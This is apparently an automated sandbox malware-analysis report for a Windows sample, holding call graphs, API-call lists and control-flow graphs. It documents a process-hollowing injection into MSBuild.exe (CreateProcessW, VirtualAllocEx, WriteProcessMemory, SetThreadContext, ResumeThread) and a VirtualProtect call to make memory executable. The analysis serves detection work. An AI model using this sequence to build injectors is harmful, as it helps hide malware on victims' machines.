__ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 23027 bbfb57 23026->23027 23027->22989 23028->23030 23031 bbfb1a 23028->23031 23032 bbfabd 23028->23032 23029 bbf62a _Fputc 77 API calls 23029->23030 23030->23026 23031->23030 23033 bcbe17 78 API calls 23031->23033 23032->23029 23032->23030 23033->23030 23042 bcb104 23034->23042 23036 bbf63a 23036->23005 23037->23004 23039 bcbe2a _Fputc 23038->23039 23046 bcbff8 23039->23046 23041 bcbe3f _Fputc 23041->23005 23043 bcb117 _Fputc 23042->23043 23044 bcb165 _Fputc 77 API calls 23043->23044 23045 bcb126 _Fputc 23044->23045 23045->23036 23047 bcc02e 23046->23047 23048 bcc006 23046->23048 23047->23041 23048->23047 23049 bcc035 23048->23049 23050 bcc013 23048->23050 23051 bcc0bb 78 API calls 23049->23051 23052 bca4c2 _Fputc 29 API calls 23050->23052 23053 bcc06d 23051->23053 23052->23047 23053->23041 23054->23016 23055->22836 23056->22836 23057->22836 23059->22845 23060->22855 23061->22850 23062->22853 23063->22868 23064->22876 23065->22878 23066->22880 23068 bc51bb _Fputc 23067->23068 23069 bc51dd 23068->23069 23071 bc5204 23068->23071 23082 bca4c2 29 API calls 2 library calls 23069->23082 23074 bc6c48 23071->23074 23073 bc51f8 _Fputc 23073->22752 23075 bc6c54 ___scrt_is_nonwritable_in_current_image 23074->23075 23083 bc4f83 EnterCriticalSection 23075->23083 23077 bc6c62 23084 bc6411 23077->23084 23081 bc6c80 23081->23073 23082->23073 23083->23077 23096 bd1dff 23084->23096 23086 bc6438 23103 bc5860 23086->23103 23093 bbe74b __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 23094 bc64ab 23093->23094 23095 bc6c97 LeaveCriticalSection __fread_nolock 23094->23095 23095->23081 23126 bd1eaa 23096->23126 23098 bd1e10 _Fputc 23099 bcf779 __fread_nolock 15 API calls 23098->23099 23102 bd1e72 23098->23102 23100 bd1e69 23099->23100 23101 bcf73f ___free_lconv_mon 14 API calls 23100->23101 23101->23102 23102->23086 23133 bc57c2 23103->23133 23106 bc5886 23139 bca4c2 29 API calls 2 library calls 23106->23139 23108 bc58a3 23119 bc54f1 23108->23119 23113 bc5721 75 API calls 23114 bc58ae std::_Locinfo::_Locinfo_ctor 23113->23114 23114->23108 23114->23113 23115 bc5aa2 23114->23115 23140 bc5420 48 API calls std::_Locinfo::_Locinfo_ctor 23114->23140 23141 bc5b10 29 API calls 23114->23141 23142 bc5b88 79 API calls 2 library calls 23114->23142 23143 bc5ce1 79 API calls __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 23114->23143 23144 bca4c2 29 API calls 2 library calls 23115->23144 23117 bc5abc 23145 bca4c2 29 API calls 2 library calls 23117->23145 23120 bcf73f ___free_lconv_mon 14 API calls 23119->23120 23121 bc5501 23120->23121 23122 bd1ee8 23121->23122 23123 bc6499 23122->23123 23124 bd1ef3 23122->23124 23123->23093 23124->23123 23125 bcabe4 ___scrt_uninitialize_crt 73 API calls 23124->23125 23125->23123 23127 bd1eb6 _Fputc 23126->23127 23128 bd1ee0 23127->23128 23129 bd2e07 __fread_nolock 29 API calls 23127->23129 23128->23098 23130 bd1ed1 23129->23130 23131 bdaf04 __fread_nolock 29 API calls 23130->23131 23132 bd1ed7 23131->23132 23132->23098 23134 bc57cd 23133->23134 23135 bc57ef 23133->23135 23146 bca4c2 29 API calls 2 library calls 23134->23146 23147 bc528c 29 API calls 2 library calls 23135->23147 23138 bc57e8 23138->23106 23138->23108 23138->23114 23139->23108 23140->23114 23141->23114 23142->23114 23143->23114 23144->23117 23145->23108 23146->23138 23147->23138 23149 bcb326 ___scrt_is_nonwritable_in_current_image 23148->23149 23150 bcb339 __fread_nolock 23149->23150 23151 bcb370 23149->23151 23160 bcb35e 23149->23160 23176 bc9bf4 14 API calls __dosmaperr 23150->23176 23161 bc4f83 EnterCriticalSection 23151->23161 23153 bcb37a 23162 bcb3d4 23153->23162 23156 bcb353 23177 bca319 29 API calls __fread_nolock 23156->23177 23160->21951 23161->23153 23165 bcb3e6 __fread_nolock 23162->23165 23168 bcb391 23162->23168 23163 bcb3f3 23265 bc9bf4 14 API calls __dosmaperr 23163->23265 23165->23163 23165->23168 23171 bcb444 23165->23171 23166 bcb3f8 23266 bca319 29 API calls __fread_nolock 23166->23266 23178 bcb3af LeaveCriticalSection __fread_nolock 23168->23178 23170 bcb56f __fread_nolock 23268 bc9bf4 14 API calls __dosmaperr 23170->23268 23171->23168 23171->23170 23173 bd2e07 __fread_nolock 29 API calls 23171->23173 23179 bd8319 23171->23179 23244 bd7a42 23171->23244 23267 bcb299 29 API calls 3 library calls 23171->23267 23173->23171 23176->23156 23177->23160 23178->23160 23180 bd832b 23179->23180 23181 bd8343 23179->23181 23269 bc9c07 14 API calls __dosmaperr 23180->23269 23183 bd8685 23181->23183 23188 bd8386 23181->23188 23284 bc9c07 14 API calls __dosmaperr 23183->23284 23184 bd8330 23270 bc9bf4 14 API calls __dosmaperr 23184->23270 23187 bd868a 23285 bc9bf4 14 API calls __dosmaperr 23187->23285 23190 bd8391 23188->23190 23192 bd8338 23188->23192 23196 bd83c1 23188->23196 23271 bc9c07 14 API calls __dosmaperr 23190->23271 23192->23171 23193 bd839e 23286 bca319 29 API calls __fread_nolock 23193->23286 23194 bd8396 23272 bc9bf4 14 API calls __dosmaperr 23194->23272 23198 bd83da 23196->23198 23199 bd8415 23196->23199 23200 bd83e7 23196->23200 23198->23200 23204 bd8403 23198->23204 23202 bcf779 __fread_nolock 15 API calls 23199->23202 23273 bc9c07 14 API calls __dosmaperr 23200->23273 23205 bd8426 23202->23205 23203 bd83ec 23274 bc9bf4 14 API calls __dosmaperr 23203->23274 23207 bdaf04 __fread_nolock 29 API calls 23204->23207 23209 bcf73f ___free_lconv_mon 14 API calls 23205->23209 23208 bd8561 23207->23208 23211 bd85d5 23208->23211 23214 bd857a GetConsoleMode 23208->23214 23212 bd842f 23209->23212 23210 bd83f3 23275 bca319 29 API calls __fread_nolock 23210->23275 23216 bd85d9 ReadFile 23211->23216 23215 bcf73f ___free_lconv_mon 14 API calls 23212->23215 23214->23211 23219 bd858b 23214->23219 23220 bd8436 23215->23220 23217 bd864d GetLastError 23216->23217 23218 bd85f1 23216->23218 23221 bd865a 23217->23221 23222 bd85b1 23217->23222 23218->23217 23223 bd85ca 23218->23223 23219->23216 23224 bd8591 ReadConsoleW 23219->23224 23225 bd845b 23220->23225 23226 bd8440 23220->23226 23282 bc9bf4 14 API calls __dosmaperr 23221->23282 23241 bd83fe __fread_nolock 23222->23241 23279 bc9c1a 14 API calls __dosmaperr 23222->23279 23236 bd862d 23223->23236 23237 bd8616 23223->23237 23223->23241 23224->23223 23229 bd85ab GetLastError 23224->23229 23278 bd5fe4 31 API calls 2 library calls 23225->23278 23276 bc9bf4 14 API calls __dosmaperr 23226->23276 23229->23222 23230 bcf73f ___free_lconv_mon 14 API calls 23230->23192 23232 bd865f 23283 bc9c07 14 API calls __dosmaperr 23232->23283 23234 bd8445 23277 bc9c07 14 API calls __dosmaperr 23234->23277 23240 bd8646 23236->23240 23236->23241 23280 bd8722 34 API calls 3 library calls 23237->23280 23281 bd89c6 32 API calls __fread_nolock 23240->23281 23241->23230 23243 bd864b 23243->23241 23245 bd7a4d 23244->23245 23246 bd7a5a 23245->23246 23250 bd7a72 23245->23250 23317 bc9bf4 14 API calls __dosmaperr 23246->23317 23248 bd7a5f 23318 bca319 29 API calls __fread_nolock 23248->23318 23251 bd7ad1 23250->23251 23259 bd7a6a 23250->23259 23319 bd9f5f 14 API calls 2 library calls 23250->23319 23253 bd2e07 __fread_nolock 29 API calls 23251->23253 23254 bd7aea 23253->23254 23287 bd8200 23254->23287 23257 bd2e07 __fread_nolock 29 API calls 23258 bd7b23 23257->23258 23258->23259 23260 bd2e07 __fread_nolock 29 API calls 23258->23260 23259->23171 23261 bd7b31 23260->23261 23261->23259 23262 bd2e07 __fread_nolock 29 API calls 23261->23262 23263 bd7b3f 23262->23263 23264 bd2e07 __fread_nolock 29 API calls 23263->23264 23264->23259 23265->23166 23266->23168 23267->23171 23268->23166 23269->23184 23270->23192 23271->23194 23272->23193 23273->23203 23274->23210 23275->23241 23276->23234 23277->23241 23278->23204 23279->23241 23280->23241 23281->23243 23282->23232 23283->23241 23284->23187 23285->23193 23286->23192 23288 bd820c ___scrt_is_nonwritable_in_current_image 23287->23288 23289 bd8214 23288->23289 23293 bd822f 23288->23293 23321 bc9c07 14 API calls __dosmaperr 23289->23321 23291 bd8219 23322 bc9bf4 14 API calls __dosmaperr 23291->23322 23292 bd8246 23323 bc9c07 14 API calls __dosmaperr 23292->23323 23293->23292 23296 bd8281 23293->23296 23298 bd829f 23296->23298 23299 bd828a 23296->23299 23297 bd824b 23324 bc9bf4 14 API calls __dosmaperr 23297->23324 23320 bd6a57 EnterCriticalSection 23298->23320 23326 bc9c07 14 API calls __dosmaperr 23299->23326 23303 bd82a5 23306 bd82d9 23303->23306 23307 bd82c4 23303->23307 23304 bd8253 23325 bca319 29 API calls __fread_nolock 23304->23325 23305 bd828f 23327 bc9bf4 14 API calls __dosmaperr 23305->23327 23311 bd8319 __fread_nolock 41 API calls 23306->23311 23328 bc9bf4 14 API calls __dosmaperr 23307->23328 23313 bd82d4 23311->23313 23312 bd82c9 23329 bc9c07 14 API calls __dosmaperr 23312->23329 23330 bd8311 LeaveCriticalSection __wsopen_s 23313->23330 23316 bd7af2 23316->23257 23316->23259 23317->23248 23318->23259 23319->23251 23320->23303 23321->23291 23322->23316 23323->23297 23324->23304 23325->23316 23326->23305 23327->23304 23328->23312 23329->23313 23330->23316 23441 bd4335 51 API calls 4 library calls 23371 bd1634 LeaveCriticalSection std::_Lockit::~_Lockit 23375 bce430 15 API calls 23377 bc4e2e 7 API calls ___scrt_uninitialize_crt 23445 bc4928 57 API calls 4 library calls 23447 bc0329 81 API calls messages 23378 bbfc2d 46 API calls 2 library calls 23379 bbe62d 32 API calls std::ios_base::_Init 23449 bc7d1e 48 API calls _unexpected 23450 bc011a 77 API calls 23385 bce417 IsProcessorFeaturePresent 23386 bbe617 33 API calls std::ios_base::_Init 23387 bd4c12 54 API calls 3 library calls 23388 bbec0c DeleteCriticalSection 23454 bbff7b 79 API calls 23392 bd1074 GetProcessHeap 23457 bb5d70 57 API calls __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 23396 bc5073 82 API calls 2 library calls 23460 ba8960 19 API calls 2 library calls 23399 bbe65b 56 API calls 2 library calls 23462 bbfb5b 31 API calls 23400 bd025f FreeLibrary 23464 bbe759 44 API calls std::ios_base::_Init 23403 bc0e59 49 API calls _unexpected 23467 bc0156 77 API calls 23406 bc2448 8 API calls 21867 ba8240 21872 ba828f 21867->21872 21868 ba8479 21878 bbe74b 21868->21878 21870 ba8484 21871 bbe6e0 8 API calls codecvt 21871->21872 21872->21868 21872->21871 21873 ba848e 21872->21873 21874 ba83b1 21872->21874 21885 ba84a0 6 API calls 2 library calls 21873->21885 21886 bca329 29 API calls 2 library calls 21874->21886 21879 bbe753 21878->21879 21880 bbe754 IsProcessorFeaturePresent 21878->21880 21879->21870 21882 bc0bd6 21880->21882 21887 bc0cbb SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 21882->21887 21884 bc0cb9 21884->21870 21887->21884 23407 bc1c42 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 23475 bc1143 DecodePointer 23476 bc5743 75 API calls

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00BEE126,00BEE116), ref: 00BEE34A
                                                                        • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 00BEE35D
                                                                        • Wow64GetThreadContext.KERNEL32(000000E0,00000000), ref: 00BEE37B
                                                                        • ReadProcessMemory.KERNELBASE(0000009C,?,00BEE16A,00000004,00000000), ref: 00BEE39F
                                                                        • VirtualAllocEx.KERNELBASE(0000009C,?,?,00003000,00000040), ref: 00BEE3CA
                                                                        • WriteProcessMemory.KERNELBASE(0000009C,00000000,?,?,00000000,?), ref: 00BEE422
                                                                        • WriteProcessMemory.KERNELBASE(0000009C,00400000,?,?,00000000,?,00000028), ref: 00BEE46D
                                                                        • WriteProcessMemory.KERNELBASE(0000009C,?,?,00000004,00000000), ref: 00BEE4AB
                                                                        • Wow64SetThreadContext.KERNEL32(000000E0,00DF0000), ref: 00BEE4E7
                                                                        • ResumeThread.KERNELBASE(000000E0), ref: 00BEE4F6
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2279089498.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2279023228.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279043918.0000000000BA1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279071566.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279145817.0000000000BEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279162447.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279218738.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
                                                                        • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$CreateProcessW$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
                                                                        • API String ID: 2687962208-3857624555
                                                                        • Opcode ID: 886e9992cd1654a34a765e8d7cb157db1c9d64fce11569bf78f58931c1f670f7
                                                                        • Instruction ID: 81248b29bf131f7bbefb630c4eca6e0107083cf14f7e65acbcb20e7b266d69b3
                                                                        • Opcode Fuzzy Hash: 886e9992cd1654a34a765e8d7cb157db1c9d64fce11569bf78f58931c1f670f7
                                                                        • Instruction Fuzzy Hash: 9EB1F67660028AAFDB60CF69CC80BDA73A5FF88714F158164EA18AB341D774FA41CB94

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 95 ba20b0-ba2114 call bcc7e0 98 ba213b-ba2140 95->98 99 ba2116 95->99 101 ba22d0-ba22d5 98->101 102 ba2146-ba214b 98->102 100 ba2640-ba2645 99->100 105 ba264b-ba2650 100->105 106 ba26d0-ba26d5 100->106 103 ba22db-ba22e0 101->103 104 ba2368-ba236d 101->104 107 ba2151-ba2156 102->107 108 ba2335-ba233a 102->108 111 ba2431-ba2484 103->111 112 ba22e6-ba22eb 103->112 109 ba25e2-ba2616 call baa220 104->109 110 ba2373-ba2378 104->110 113 ba26fd-ba2702 105->113 114 ba2656-ba265b 105->114 119 ba2742-ba2747 106->119 120 ba26d7-ba26dc 106->120 115 ba215c-ba2161 107->115 116 ba23b7-ba23cf 107->116 117 ba211b-ba2128 108->117 118 ba2340-ba2345 108->118 158 ba2625-ba262d 109->158 124 ba237e-ba23ac 110->124 125 ba2130-ba2135 110->125 111->98 133 ba248a 111->133 131 ba248f-ba24c7 112->131 132 ba22f1-ba22f6 112->132 126 ba2708-ba270d 113->126 127 ba2962-ba299a 113->127 134 ba279a-ba28ca 114->134 135 ba2661-ba2666 114->135 136 ba2167-ba216c 115->136 137 ba23d4-ba2414 115->137 128 ba28f5-ba290d 116->128 117->125 118->125 138 ba234b-ba235d 118->138 129 ba274d-ba2752 119->129 130 ba29b2-ba29e7 119->130 121 ba2918-ba292a 120->121 122 ba26e2-ba26e7 120->122 121->98 139 ba2930 121->139 150 ba26ed-ba26f2 122->150 151 ba2935-ba2957 122->151 124->98 143 ba23b2 124->143 125->98 125->100 126->125 152 ba2713-ba273d 126->152 144 ba299e-ba29a7 127->144 128->98 155 ba2913 128->155 129->125 153 ba2758-ba277a 129->153 145 ba29ea-ba29f7 130->145 149 ba24d0-ba24d6 131->149 132->125 154 ba22fc-ba2319 call bbfe96 132->154 133->100 134->144 147 ba28cf-ba28f0 135->147 148 ba266c-ba2671 135->148 136->125 140 ba216e-ba21a6 136->140 137->98 146 ba241a 137->146 138->98 141 ba2363 138->141 139->100 156 ba21b0-ba21b6 140->156 141->100 143->100 144->98 159 ba29ad 144->159 145->98 160 ba29fd 145->160 146->100 147->128 148->125 161 ba2677-ba26c5 148->161 162 ba251b-ba253b 149->162 163 ba24d8-ba24de 149->163 150->125 164 ba26f8-ba2aab 150->164 151->98 157 ba295d 151->157 152->145 165 ba277f-ba278f 153->165 175 ba231c-ba2330 154->175 155->100 166 ba21fb-ba221b 156->166 167 ba21b8-ba21be 156->167 157->100 158->98 168 ba2633-ba263d 158->168 159->100 160->100 161->98 169 ba26cb 161->169 172 ba2540-ba2546 162->172 170 ba2509-ba2519 163->170 171 ba24e0-ba24e6 163->171 179 ba2ab0-ba2ab5 164->179 165->98 174 ba2795 165->174 178 ba2220-ba2226 166->178 176 ba21e9-ba21f9 167->176 177 ba21c0-ba21c6 167->177 168->100 169->100 170->162 170->163 171->149 180 ba24e8-ba2505 171->180 181 ba2548-ba254e 172->181 182 ba2590-ba2596 172->182 174->100 175->165 176->166 176->167 177->156 183 ba21c8-ba21e5 177->183 184 ba2228-ba222e 178->184 185 ba2270-ba2276 178->185 186 ba2abb-ba2ac0 179->186 187 ba2bd0-ba2bd5 179->187 180->163 188 ba2507 180->188 189 ba255d-ba2585 181->189 190 ba2550-ba2556 181->190 191 ba25b7-ba25da 182->191 192 ba2597-ba259e 182->192 183->167 194 ba21e7 183->194 195 ba223d-ba2265 184->195 196 ba2230-ba2236 184->196 199 ba2278-ba227e 185->199 200 ba2297-ba22ba 185->200 197 ba2ace-ba2bc9 186->197 198 ba2ac2-ba2ac7 186->198 201 ba2bd7-ba2bdc 187->201 202 ba2bf4-ba2c09 187->202 188->162 189->181 204 ba2587 189->204 190->172 203 ba2558-ba2620 190->203 191->181 193 ba25e0 191->193 192->172 205 ba25a0-ba25b3 192->205 193->182 194->166 195->184 207 ba2267 195->207 196->178 206 ba2238-ba242c 196->206 197->186 209 ba2bcf 197->209 198->179 208 ba2ac9-ba3256 call bab950 call baa8e0 call bbe74b 198->208 199->178 210 ba2280-ba2293 199->210 200->184 212 ba22c0 200->212 201->179 211 ba2be2-ba2bec 201->211 202->186 213 ba2c0f 202->213 203->158 204->182 205->181 221 ba25b5 205->221 206->158 207->185 209->187 210->184 222 ba2295 210->222 211->186 217 ba2bf2 211->217 212->185 213->187 217->187 221->182 222->185
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2279043918.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2279023228.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279071566.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279089498.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279145817.0000000000BEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279162447.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279218738.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: _strlen
                                                                        • String ID: t8y$t8y$t8y$t8y$|Uh)$|Uh)
                                                                        • API String ID: 4218353326-1934805655
                                                                        • Opcode ID: 1f003f04f5093356da05e059417104b09e3df23d10008700b34d4253d64fa9ba
                                                                        • Instruction ID: 8c96687e324e7b0eb80c1ff99a033c0faa2376971efffa9cb61a3179da203e2e
                                                                        • Opcode Fuzzy Hash: 1f003f04f5093356da05e059417104b09e3df23d10008700b34d4253d64fa9ba
                                                                        • Instruction Fuzzy Hash: 11923836B197104FDB18CF2DC8E17AA77D2ABC9314F19896EE98AD7351DA78CC018B41
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2279043918.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2279023228.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279071566.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279089498.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279145817.0000000000BEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279162447.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279218738.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: IOS_BASE: $[+]: %P$`[c$`[c$nxxz$nxxz
                                                                        • API String ID: 0-3990319704
                                                                        • Opcode ID: 3936879194d0a0d2160c9a760383474ce9503c44fbed8b55c04792ca9015986f
                                                                        • Instruction ID: 26d7149c41a4a6bbcc9714a8bc9bfd21e3ba5c450c032087f6c7c9242e3ed1cd
                                                                        • Opcode Fuzzy Hash: 3936879194d0a0d2160c9a760383474ce9503c44fbed8b55c04792ca9015986f
                                                                        • Instruction Fuzzy Hash: B892557AB5C3408FD764CA2CC4D13AAB7E2EB9A300F148D6EE599C7351DA79CC458B42
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2279043918.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2279023228.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279071566.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279089498.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279145817.0000000000BEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279162447.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279218738.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: `[c$`[c$`[c$`[c$#+$#+
                                                                        • API String ID: 0-2683189902
                                                                        • Opcode ID: 388b93aa0132f9b0fe21b6e18a5a13043a16821350265a93a682214465fc7e5d
                                                                        • Instruction ID: 4e0cb03abe78b176b491c37df566e60ca5a7507b965998ce5e612013a6a66c3d
                                                                        • Opcode Fuzzy Hash: 388b93aa0132f9b0fe21b6e18a5a13043a16821350265a93a682214465fc7e5d
                                                                        • Instruction Fuzzy Hash: 79234736B146408FDB68CA38C4E53FB77D2ABD5310F29986ED88AC7351DAB9CC458B41

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1196 ba6390-ba6410 GetPEB call ba5ff0 1199 ba6412 FreeConsole 1196->1199 1200 ba6414-ba6489 call ba1000 * 2 call ba4280 call ba6970 call bbcd60 call bbbfa0 call baacb0 1196->1200 1199->1200 1215 ba65ab-ba65b0 1200->1215 1216 ba648f 1200->1216 1218 ba6660-ba6665 1215->1218 1219 ba65b6-ba65bb 1215->1219 1217 ba66e0-ba66e5 1216->1217 1224 ba6710-ba6715 1217->1224 1225 ba66e7-ba66ec 1217->1225 1220 ba666b-ba6670 1218->1220 1221 ba6904-ba6915 1218->1221 1222 ba687c-ba6896 VirtualProtect 1219->1222 1223 ba65c1-ba65c6 1219->1223 1229 ba65a0-ba65a5 1220->1229 1230 ba6676-ba669a 1220->1230 1221->1215 1233 ba691b 1221->1233 1228 ba689b-ba68a3 1222->1228 1231 ba68ae-ba68d3 call ba5ff0 1223->1231 1232 ba65cc-ba65d1 1223->1232 1226 ba671b-ba6720 1224->1226 1227 ba6935-ba6946 1224->1227 1234 ba66f2-ba66f7 1225->1234 1235 ba6920-ba692a 1225->1235 1226->1229 1239 ba6726-ba687a 1226->1239 1227->1215 1240 ba694c 1227->1240 1228->1215 1241 ba68a9 1228->1241 1229->1215 1229->1217 1243 ba669f-ba66a2 1230->1243 1231->1215 1250 ba68d9 1231->1250 1232->1229 1244 ba65d3-ba65df 1232->1244 1233->1235 1236 ba66fd-ba6702 1234->1236 1237 ba6494-ba659f 1234->1237 1235->1215 1238 ba6930 1235->1238 1236->1229 1245 ba6708-ba6964 call bbe74b 1236->1245 1237->1229 1238->1217 1239->1228 1240->1217 1241->1217 1243->1243 1247 ba66a4-ba66c2 1243->1247 1248 ba65e0-ba65e6 1244->1248 1251 ba65e8-ba65ee 1248->1251 1252 ba6620-ba6626 1248->1252 1250->1217 1256 ba65fd-ba6614 1251->1256 1257 ba65f0-ba65f6 1251->1257 1253 ba6628-ba662e 1252->1253 1254 ba6641-ba664e 1252->1254 1253->1248 1259 ba6630-ba663d 1253->1259 1254->1251 1260 ba6650 1254->1260 1256->1251 1258 ba6616 1256->1258 1257->1248 1262 ba65f8-ba68f9 1257->1262 1258->1252 1259->1251 1264 ba663f 1259->1264 1260->1252 1262->1215 1265 ba68ff 1262->1265 1264->1252 1265->1217
                                                                        APIs
                                                                          • Part of subcall function 00BA5FF0: _strlen.LIBCMT ref: 00BA615B
                                                                        • FreeConsole.KERNELBASE ref: 00BA6412
                                                                        • VirtualProtect.KERNELBASE(00BEE027,?,00000040,?,00000000,0000000A,00000000), ref: 00BA688D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2279043918.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2279023228.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279071566.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279089498.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279145817.0000000000BEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279162447.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279218738.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: ConsoleFreeProtectVirtual_strlen
                                                                        • String ID: %d %d
                                                                        • API String ID: 1248733679-3777365115
                                                                        • Opcode ID: 5b0fbd9366d1813c3a6e856a302d16141497a0eff3a0d8ec3ee86320b9d8e7b9
                                                                        • Instruction ID: a0d7dc626e41b3e62d8585ddca508a43369ea70ce082e71a32ea0b211676cbb0
                                                                        • Opcode Fuzzy Hash: 5b0fbd9366d1813c3a6e856a302d16141497a0eff3a0d8ec3ee86320b9d8e7b9
                                                                        • Instruction Fuzzy Hash: 2AD16BB6F541044BDF188A38D8957EF37E2EB96300F29847AD819EB391EE79DC058B41

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
